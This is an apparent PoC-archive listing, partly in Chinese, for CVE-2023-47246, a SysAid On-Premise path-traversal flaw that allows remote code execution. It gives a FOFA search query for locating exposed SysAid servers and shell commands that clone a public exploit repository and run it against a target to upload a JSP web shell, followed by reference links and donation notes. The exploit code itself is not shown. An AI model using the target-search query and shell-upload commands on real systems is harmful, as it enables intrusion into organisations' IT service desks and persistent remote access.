关联漏洞
标题:Sysaid Technologies SysAid 安全漏洞 (CVE-2023-47246)Description:Sysaid Technologies SysAid是以色列Sysaid Technologies公司的一套IT服务管理解决方案。SysAid On-Premise是SysAid的本地安装版。 Sysaid Technologies SysAid On-Premise 23.3.36之前版本存在安全漏洞,该漏洞源于存在路径遍历漏洞。攻击者可利用的该漏洞将文件写入Tomcat webroot后执行代码。
Description
exploit for cve-2023-47246 SysAid RCE (shell upload)
介绍
# Vulnerability Details
1. fofa:
```text
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
```
2. Affected versions: SysAid Server<23.3.36
# Vulnerability Recurrence
1. Execute the script:
```shell
git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
cd CVE-2023-47246-EXP
pip install -r requirements.txt
python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp
```
2. result:
# Reference
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability
文件快照
[4.0K] /data/pocs/a108e1369e3bf04f07e696ce656652bc2570af73
├── [ 12K] CVE-2023-47246-EXP.py
├── [ 4] CVE-2023-47246.txt
├── [1.0K] README.md
└── [ 16] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。